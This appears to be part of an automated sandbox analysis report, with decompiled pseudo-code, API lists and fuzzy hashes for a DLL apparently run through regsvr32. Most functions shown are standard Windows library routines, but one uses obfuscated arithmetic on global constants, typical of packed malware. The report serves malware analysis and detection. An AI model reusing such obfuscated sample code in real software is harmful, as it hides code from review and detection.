                                                                        0x1000e1a6
                                                                        0x1000e1ae
                                                                        0x1000e1af
                                                                        0x1000e1b4
                                                                        0x1000e1b9
                                                                        0x1000e1bb
                                                                        0x1000e1c1
                                                                        0x1000e1c2
                                                                        0x1000e1c7
                                                                        0x1000e1cc
                                                                        0x1000e1d2
                                                                        0x1000e1d4
                                                                        0x1000e1e8
                                                                        0x1000e1eb
                                                                        0x1000e1f1
                                                                        0x1000e1f1
                                                                        0x1000e1f4
                                                                        0x1000e1fa
                                                                        0x1000e1fa
                                                                        0x1000e207
                                                                        0x1000e215
                                                                        0x1000e209
                                                                        0x1000e20e
                                                                        0x1000e20e
                                                                        0x1000e217
                                                                        0x1000e21a
                                                                        0x1000e220
                                                                        0x1000e223
                                                                        0x1000e226
                                                                        0x1000e22a
                                                                        0x1000e231
                                                                        0x1000e231
                                                                        0x1000e240
                                                                        0x1000e251
                                                                        0x1000e242
                                                                        0x1000e24a
                                                                        0x1000e24a
                                                                        0x1000e256
                                                                        0x1000e25d
                                                                        0x1000e268
                                                                        0x1000e26e
                                                                        0x1000e271
                                                                        0x1000e277
                                                                        0x1000e27b
                                                                        0x1000e28d
                                                                        0x1000e290
                                                                        0x1000e29b
                                                                        0x1000e2a3
                                                                        0x1000e3d2
                                                                        0x1000e3d5
                                                                        0x1000e3d8
                                                                        0x1000e3da
                                                                        0x1000e3dc
                                                                        0x1000e3de
                                                                        0x1000e3e4
                                                                        0x1000e3e9
                                                                        0x1000e3ec
                                                                        0x1000e3f9
                                                                        0x1000e3ee
                                                                        0x1000e3f2
                                                                        0x1000e3f2
                                                                        0x1000e3fb
                                                                        0x1000e402
                                                                        0x1000e405
                                                                        0x1000e40c
                                                                        0x1000e40f
                                                                        0x1000e3dc
                                                                        0x1000e414
                                                                        0x1000e41c
                                                                        0x1000e421
                                                                        0x1000e428
                                                                        0x1000e429
                                                                        0x1000e432
                                                                        0x1000e435
                                                                        0x1000e43d
                                                                        0x1000e43f
                                                                        0x1000e444
                                                                        0x1000e447
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000e44e
                                                                        0x1000e45b
                                                                        0x1000e469
                                                                        0x1000e46f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000e44b
                                                                        0x1000e471
                                                                        0x1000e473
                                                                        0x1000e478
                                                                        0x1000e47c
                                                                        0x1000e482
                                                                        0x1000e482
                                                                        0x1000e485
                                                                        0x1000e488
                                                                        0x1000e488
                                                                        0x1000e48b
                                                                        0x00000000
                                                                        0x1000e43a
                                                                        0x00000000
                                                                        0x1000e48b
                                                                        0x1000e43d
                                                                        0x1000e48d
                                                                        0x1000e493
                                                                        0x1000e493
                                                                        0x1000e499
                                                                        0x1000e499
                                                                        0x1000e499
                                                                        0x1000e1a0
                                                                        0x1000e4a4
                                                                        0x1000e4b5

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1000E154
                                                                        • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 1000E27B
                                                                        • CoTaskMemFree.OLE32(?,?,00000000), ref: 1000E493
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Task$AllocFreeH_prolog
                                                                        • String ID:
                                                                        • API String ID: 1522537378-3916222277
                                                                        • Opcode ID: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
                                                                        • Instruction ID: e4bcf968e0ea1d6695bf60cb4aa7b1ca6ea302c548195cc232f4004078e55fdd
                                                                        • Opcode Fuzzy Hash: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
                                                                        • Instruction Fuzzy Hash: AAC11874A006489FDB24CFA8C884AAEBBF5FF88344F20465DE155EB256DB71AD45CF10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10033B73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E10033B73(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
				intOrPtr _v8;
				void* __ebp;
				int _t42;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t74;
				intOrPtr _t76;
				void* _t77;

				_t69 = __edx;
				_push(__ecx);
				_t71 = _a4;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t71 + 0x84)) == 0) {
					L6:
					if(( *(_t71 + 0x7c) & 0x00000004) != 0) {
						_a16 = _a16 | 0x00000004;
						if((_a17 & 0x00000050) != 0) {
							_a16 = _a16 & 0xffff2fff | 0x00002000;
						}
					}
					_t74 = E100339A3(_v8, _a16);
					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
					if( *(_t74 + 0x34) == 0) {
						 *(_t74 + 0x34) =  *(_t71 + 0x1c);
					}
					E1002D821(E10020230(_t74, 0xe81f), _t69, _t71, 0);
					 *((intOrPtr*)( *_t74 + 0x144))(1);
					_t42 = GetWindowLongA( *(_t71 + 0x1c), 0xfffffff0);
					if((_t42 & 0x10000000) == 0) {
						L14:
						return _t42;
					} else {
						E100203AD(_t74, 8);
						L13:
						_t42 = UpdateWindow( *(_t74 + 0x1c));
						goto L14;
					}
				}
				_t76 =  *((intOrPtr*)(_t71 + 0x88));
				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x90)) == 0 || E1002D0E3(_t76) != 1 || ( *(_t76 + 0x7c) & _a16 & 0x000000f0) == 0) {
					goto L6;
				} else {
					_t74 = E100220EE(_t77, GetParent( *(_t76 + 0x1c)));
					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
					 *((intOrPtr*)( *_t74 + 0x144))(1);
					goto L13;
				}
			}











                                                                        0x10033b73
                                                                        0x10033b76
                                                                        0x10033b7a
                                                                        0x10033b85
                                                                        0x10033b88
                                                                        0x10033be7
                                                                        0x10033beb
                                                                        0x10033bed
                                                                        0x10033bf5
                                                                        0x10033c04
                                                                        0x10033c04
                                                                        0x10033bf5
                                                                        0x10033c19
                                                                        0x10033c21
                                                                        0x10033c29
                                                                        0x10033c2e
                                                                        0x10033c2e
                                                                        0x10033c41
                                                                        0x10033c4c
                                                                        0x10033c57
                                                                        0x10033c62
                                                                        0x10033c76
                                                                        0x10033c7a
                                                                        0x10033c64
                                                                        0x10033c68
                                                                        0x10033c6d
                                                                        0x10033c70
                                                                        0x00000000
                                                                        0x10033c70
                                                                        0x10033c62
                                                                        0x10033b8a
                                                                        0x10033b92
                                                                        0x00000000
                                                                        0x10033bb3
                                                                        0x10033bc9
                                                                        0x10033bd1
                                                                        0x10033bdc
                                                                        0x00000000
                                                                        0x10033bdc

                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 10033BB6
                                                                          • Part of subcall function 100204FE: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,10021B8B,?,10021B8B,00000000,?,?,000000FF,000000FF,00000015), ref: 10020524
                                                                        • GetWindowLongA.USER32 ref: 10033C57
                                                                        • UpdateWindow.USER32(?), ref: 10033C70
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$LongParentUpdate
                                                                        • String ID: P
                                                                        • API String ID: 1906497633-3110715001
                                                                        • Opcode ID: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
                                                                        • Instruction ID: 435d97fdf23aa9ac89b11464d0137bb6244da47e738824af3fb8fae0d11c22b6
                                                                        • Opcode Fuzzy Hash: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
                                                                        • Instruction Fuzzy Hash: 1D31BE74600749AFDB12DF24DC89FAEBBE9EF00355F008519F952AA6A2CB71AC50CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10034C5F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E10034C5F(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v16;
				char _v276;
				intOrPtr _t10;
				long _t12;
				void* _t13;
				CHAR* _t16;
				void* _t30;
				void* _t33;

				_t10 =  *0x1004c470; // 0x303bb91f
				_v8 = _t10;
				_t12 = GetModuleFileNameA( *(__ecx + 0x40),  &_v276, 0x104);
				if(_t12 == 0 || _t12 == 0x104) {
					L4:
					_t13 = 0;
				} else {
					_push(__esi);
					_push(__edi);
					_t16 = PathFindExtensionA( &_v276);
					asm("movsd");
					asm("movsw");
					asm("movsb");
					_pop(_t30);
					_pop(_t33);
					if(_t16 -  &_v276 + 7 > 0x104) {
						goto L4;
					} else {
						lstrcpyA(_t16,  &_v16);
						_t13 = E10034959(0x104, _t30, _t33,  &_v276);
					}
				}
				return E100117AE(_t13, _v8);
			}












                                                                        0x10034c68
                                                                        0x10034c6e
                                                                        0x10034c81
                                                                        0x10034c89
                                                                        0x10034cd6
                                                                        0x10034cd6
                                                                        0x10034c8f
                                                                        0x10034c8f
                                                                        0x10034c90
                                                                        0x10034c98
                                                                        0x10034ca6
                                                                        0x10034ca7
                                                                        0x10034cb3
                                                                        0x10034cb9
                                                                        0x10034cba
                                                                        0x10034cbb
                                                                        0x00000000
                                                                        0x10034cbd
                                                                        0x10034cc2
                                                                        0x10034ccf
                                                                        0x10034ccf
                                                                        0x10034cbb
                                                                        0x10034ce2

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10034C81
                                                                        • PathFindExtensionA.SHLWAPI(?), ref: 10034C98
                                                                        • lstrcpyA.KERNEL32(00000000,?), ref: 10034CC2
                                                                          • Part of subcall function 10034959: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
                                                                          • Part of subcall function 10034959: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
                                                                          • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
                                                                          • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
                                                                          • Part of subcall function 10034959: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
                                                                          • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
                                                                          • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                                                        • String ID: %s.dll
                                                                        • API String ID: 4178508759-3668843792
                                                                        • Opcode ID: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
                                                                        • Instruction ID: 2fc2d964ca32bfe118a4256934f177e00eb1d7d938e4b77c6fceda29c47fe86b
                                                                        • Opcode Fuzzy Hash: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
                                                                        • Instruction Fuzzy Hash: 4601A7B6E0111CAFDF56EBA4CC85DEE77BCFB49341F0105BAE615DB110EAB0AA448B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100364C3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 59%
                                                                        			E100364C3() {
				signed short _v16;
				signed short _v20;
				char _v24;
				signed int _t6;
				intOrPtr* _t16;
				signed int _t19;

				_t6 =  *0x1004b8c8; // 0xffffffff
				if(_t6 != 0xffffffff) {
					return _t6;
				}
				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
				_t19 = 0x40000;
				if(_t16 != 0) {
					E10011C50( &_v24, 0, 0x14);
					_push( &_v24);
					_v24 = 0x14;
					if( *_t16() >= 0) {
						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x1004b8c8 = _t19;
				return _t19;
			}









                                                                        0x100364c9
                                                                        0x100364d1
                                                                        0x10036530
                                                                        0x10036530
                                                                        0x100364ec
                                                                        0x100364f0
                                                                        0x100364f5
                                                                        0x100364ff
                                                                        0x1003650a
                                                                        0x1003650b
                                                                        0x10036516
                                                                        0x10036523
                                                                        0x10036523
                                                                        0x10036516
                                                                        0x10036525
                                                                        0x00000000

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(COMCTL32.DLL), ref: 100364DA
                                                                        • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 100364E6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: COMCTL32.DLL$DllGetVersion
                                                                        • API String ID: 1646373207-1518460440
                                                                        • Opcode ID: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
                                                                        • Instruction ID: 84e3accee20d911db9e507edd914a9ca92682ab11397d206feed8d4dda6cc4c4
                                                                        • Opcode Fuzzy Hash: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
                                                                        • Instruction Fuzzy Hash: 3BF04FB1E006296AE702DBED9C84BAA7BACEB08751F510535FA10EB191E670DD0487B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10029A8E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E10029A8E(struct HWND__* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v20;
				intOrPtr _t9;
				signed int _t17;

				_t9 =  *0x1004c470; // 0x303bb91f
				_v8 = _t9;
				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
					_t10 = 0;
				} else {
					GetClassNameA(_a4,  &_v20, 0xa);
					_t17 = lstrcmpiA( &_v20, "combobox");
					asm("sbb eax, eax");
					_t10 =  ~_t17 + 1;
				}
				return E100117AE(_t10, _v8);
			}







                                                                        0x10029a98
                                                                        0x10029a9d
                                                                        0x10029aa0
                                                                        0x10029ab5
                                                                        0x10029ab9
                                                                        0x10029ac2
                                                                        0x10029ad1
                                                                        0x10029ad9
                                                                        0x10029adb
                                                                        0x10029adb
                                                                        0x10029ae5

                                                                        APIs
                                                                        • GetWindowLongA.USER32 ref: 10029AA7
                                                                        • GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
                                                                        • lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ClassLongNameWindowlstrcmpi
                                                                        • String ID: combobox
                                                                        • API String ID: 2054663530-2240613097
                                                                        • Opcode ID: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
                                                                        • Instruction ID: 60cbb10a2f119aa8ec71494133184de8fc03b2720933236f2cbab57e6d3057ab
                                                                        • Opcode Fuzzy Hash: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
                                                                        • Instruction Fuzzy Hash: 32F03A3151421CAFDB01EFA5CC95EAE3BB4FB05385F508524F821DA1A1DB30AA448B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10019599 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 62%
                                                                        			E10019599(void* __eflags) {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;

				_push(0x10);
				_push(0x10042d28);
				E10012514(_t13, _t14, _t15);
				_t9 =  *0x1004f820;
				if(_t9 == 0) {
					if( *0x1004f3e0 == 1) {
						L4:
						_t9 = 0x10019589;
						 *0x1004f820 = 0x10019589;
					} else {
						_t12 = GetModuleHandleA("kernel32.dll");
						if(_t12 == 0) {
							goto L4;
						} else {
							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
							 *0x1004f820 = _t9;
							if(_t9 == 0) {
								goto L4;
							}
						}
					}
				}
				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
				return E1001254F(_t10);
			}









                                                                        0x10019599
                                                                        0x1001959b
                                                                        0x100195a0
                                                                        0x100195a5
                                                                        0x100195ac
                                                                        0x100195b5
                                                                        0x100195db
                                                                        0x100195db
                                                                        0x100195e0
                                                                        0x100195b7
                                                                        0x100195bc
                                                                        0x100195c4
                                                                        0x00000000
                                                                        0x100195c6
                                                                        0x100195cc
                                                                        0x100195d2
                                                                        0x100195d9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100195d9
                                                                        0x100195c4
                                                                        0x100195b5
                                                                        0x100195e5
                                                                        0x100195f1
                                                                        0x1001961a
                                                                        0x10019623

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,10042D28,00000010,100139E9,00000000,00000FA0,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 100195BC
                                                                        • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 100195CC
                                                                        Strings
                                                                        • kernel32.dll, xrefs: 100195B7
                                                                        • InitializeCriticalSectionAndSpinCount, xrefs: 100195C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                        • API String ID: 1646373207-3733552308
                                                                        • Opcode ID: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
                                                                        • Instruction ID: 1db327cb421c3a6b8c58775e1e461de9fba8f787e71f0b035f5b3f69bb676500
                                                                        • Opcode Fuzzy Hash: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
                                                                        • Instruction Fuzzy Hash: 05F05E70600656EFEB02EFA58D98B9D3AF2FB45345B114169F410EE160EB35D6809B28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10004DD0 Relevance: 6.2, APIs: 4, Instructions: 188memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 64%
                                                                        			E10004DD0() {
				void* _t51;
				signed int _t53;
				signed int _t59;
				signed int _t61;
				intOrPtr _t82;
				signed int _t96;
				signed int _t103;
				signed int _t111;
				signed int _t112;
				signed int _t120;
				signed int _t121;
				signed int _t125;
				signed int _t132;
				signed int _t139;
				signed int _t142;
				signed int _t151;
				intOrPtr _t157;
				signed int _t159;
				signed int _t162;
				signed int _t163;
				void* _t164;
				signed int _t166;
				signed int _t173;
				signed int _t177;
				signed int _t189;
				void* _t195;
				void* _t196;

				_t164 =  *(_t195 + 0xc);
				if(_t164 != 0) {
					if( *((intOrPtr*)(_t164 + 0x10)) != 0) {
						_t132 =  *0x1004b0e0; // 0x0
						_t103 =  *0x1004b0dc; // 0x0
						_t151 =  *0x1004b0e8; // 0x0
						_t162 =  *0x1004b0e4; // 0x0
						_t82 =  *((intOrPtr*)(_t164 + 4));
						_t163 =  *0x1004b0ec; // 0x0
						 *((intOrPtr*)( *((intOrPtr*)( *_t164 + 0x28)) + ((_t103 * _t132 * _t151 + _t162 * 2) * _t151 + _t132 * _t132 - _t162 - _t163) * 4 + _t82))(_t82, 0, 0);
					}
					_t111 =  *0x1004b0dc; // 0x0
					_t53 =  *0x1004b0e8; // 0x0
					_t166 =  *0x1004b0ec; // 0x0
					_t10 = _t111 + 1; // 0x1
					_t112 =  *0x1004b0e0; // 0x0
					 *0x1004d3e0(((_t112 - _t166 << 1) - _t10 * _t111 -  *0x1004b0e4 + _t53 *  *0x1004b0d8 << 5) +  *((intOrPtr*)(_t164 + 0x30)));
					_t196 = _t195 + 4;
					if( *((intOrPtr*)(_t164 + 8)) == 0) {
						L9:
						_t157 =  *((intOrPtr*)(_t164 + 4));
						if(_t157 != 0) {
							_t59 =  *0x1004b0dc; // 0x0
							_t120 =  *0x1004b0ec; // 0x0
							_t139 =  *0x1004b0e8; // 0x0
							_t121 =  *0x1004b0e0; // 0x0
							 *((intOrPtr*)(_t164 + 0x20))(_t157, 0, (_t59 * _t120 + 1 + _t139 *  *0x1004b0d8 * 0x3fffffff) * _t120 + (_t139 + 1 + _t121 * 0x3fffffff) *  *0x1004b0e4 + 0x2000 + _t121 * 2 - _t59 << 2,  *((intOrPtr*)(_t164 + 0x34)));
						}
						return HeapFree(GetProcessHeap(), 0, _t164);
					} else {
						_t125 =  *0x1004b0e0; // 0x0
						_t159 =  *0x1004b0ec; // 0x0
						_t173 =  *0x1004b0dc; // 0x0
						_t142 =  *0x1004b0d8; // 0x0
						_t61 =  *0x1004b0e4; // 0x0
						_t12 = _t125 + 1; // 0x1
						 *(_t196 + 0x18) = 0;
						if( *((intOrPtr*)(_t164 + 0xc)) - (_t173 * _t142 + _t12 * _t159 + _t61 << 1) <= 0) {
							L8:
							 *0x1004d3e0((_t61 << 4) - ((_t142 * _t142 << 4) + 0x10) * _t159 +  *((intOrPtr*)(_t164 + 8)));
							_t196 = _t196 + 4;
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t96 =  *0x1004b0dc; // 0x0
							_t177 =  *0x1004b0e8; // 0x0
							 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t164 + 8));
							if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)) + ( *(_t196 + 0x18) + ((_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 2 + (_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 4)) != 0) {
								_t189 =  *0x1004b0e4; // 0x0
								_t25 = _t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 - 2; // -268742890
								 *((intOrPtr*)(_t164 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x14)) + ((_t125 - (_t142 * _t142 << 1) + _t125 + 2) *  *0x1004b0e4 +  *((intOrPtr*)(_t196 + 0x1c)) + (_t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 + _t25) * _t96 + (_t159 + 1) * _t125 * 2) * 4)),  *((intOrPtr*)(_t164 + 0x34)));
								_t142 =  *0x1004b0d8; // 0x0
								_t159 =  *0x1004b0ec; // 0x0
								_t125 =  *0x1004b0e0; // 0x0
								_t96 =  *0x1004b0dc; // 0x0
								_t196 = _t196 + 8;
							}
							_t61 =  *0x1004b0e4; // 0x0
							 *(_t196 + 0x18) =  *(_t196 + 0x18) + 1;
							_t37 = _t125 + 1; // 0x1
						} while ( *(_t196 + 0x18) <  *((intOrPtr*)(_t164 + 0xc)) - (_t96 * _t142 + _t37 * _t159 + _t61 << 1));
						goto L8;
					}
				}
				return _t51;
			}






























                                                                        0x10004dd2
                                                                        0x10004dd8
                                                                        0x10004de6
                                                                        0x10004de8
                                                                        0x10004dee
                                                                        0x10004df4
                                                                        0x10004dfd
                                                                        0x10004e06
                                                                        0x10004e1d
                                                                        0x10004e2f
                                                                        0x10004e2f
                                                                        0x10004e31
                                                                        0x10004e37
                                                                        0x10004e43
                                                                        0x10004e4c
                                                                        0x10004e52
                                                                        0x10004e6c
                                                                        0x10004e75
                                                                        0x10004e7a
                                                                        0x10004fbd
                                                                        0x10004fbd
                                                                        0x10004fc2
                                                                        0x10004fc7
                                                                        0x10004fcc
                                                                        0x10004fd3
                                                                        0x10004ff4
                                                                        0x1000501f
                                                                        0x10005022
                                                                        0x00000000
                                                                        0x10004e80
                                                                        0x10004e80
                                                                        0x10004e86
                                                                        0x10004e8c
                                                                        0x10004e92
                                                                        0x10004e98
                                                                        0x10004ea0
                                                                        0x10004eb3
                                                                        0x10004ebb
                                                                        0x10004f9b
                                                                        0x10004fb4
                                                                        0x10004fba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10004ec1
                                                                        0x10004ec1
                                                                        0x10004ec4
                                                                        0x10004eca
                                                                        0x10004ed0
                                                                        0x10004ef3
                                                                        0x10004efc
                                                                        0x10004f1d
                                                                        0x10004f51
                                                                        0x10004f54
                                                                        0x10004f5a
                                                                        0x10004f60
                                                                        0x10004f66
                                                                        0x10004f6c
                                                                        0x10004f6c
                                                                        0x10004f76
                                                                        0x10004f7c
                                                                        0x10004f80
                                                                        0x10004f91
                                                                        0x00000000
                                                                        0x10004ec1
                                                                        0x10004e7a
                                                                        0x1000503a

                                                                        APIs
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 10004E6C
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 10004FB4
                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 10005028
